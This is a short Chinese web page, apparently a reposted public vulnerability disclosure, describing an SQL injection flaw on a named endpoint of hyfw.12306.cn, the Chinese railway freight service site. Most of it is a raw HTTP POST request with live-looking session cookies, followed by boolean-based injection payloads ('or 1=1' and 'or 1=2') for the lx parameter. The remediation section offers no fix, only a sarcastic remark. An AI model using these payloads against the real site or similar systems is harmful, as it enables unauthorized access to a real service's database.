12306某处SQL注入漏洞下载

12306某处SQL注入漏洞

POST /hyinfo/action/JgxxAction_hwyjl HTTP/1.1

Host: hyfw.12306.cn

Proxy-Connection: keep-alive

Content-Length: 16

Accept: */*

Origin: http://hyfw.12306.cn

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://hyfw.12306.cn/hyinfo/action/JgxxAction_index?type=1

Accept-Encoding: gzip,deflate,sdch

Accept-Language: zh-CN,zh;q=0.8

Cookie: TVvHsVfkbo=MDAwM2IyOWE2NjgwMDAwMDAwMDIwRCsydXcxMzk1NDM5MDgx; JSESSIONID=vvWXTsCLYqrQLJ4LpVYMJzsnxY84zY0wHw6dvDgNPY2VN2ppRndp!-2097492747



lx=ld





lx=ld' or '1'='1

lx=ld' or '1'='2

http://hyfw.12306.cn/hyinfo/action/ClcscxAction_index?cllx=JZX

修复方案：你们的安全人员绝对不是吃软饭的，我就不献丑了

上一篇： [公开漏洞]魔法桌面主站注入15万用户数据及分站全部沦陷

下一篇： [公开漏洞]青芒果房管家某分站配置错误导致任意文件上传(可获取shell)

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

12306某处SQL注入漏洞下载

推荐文章

推荐网站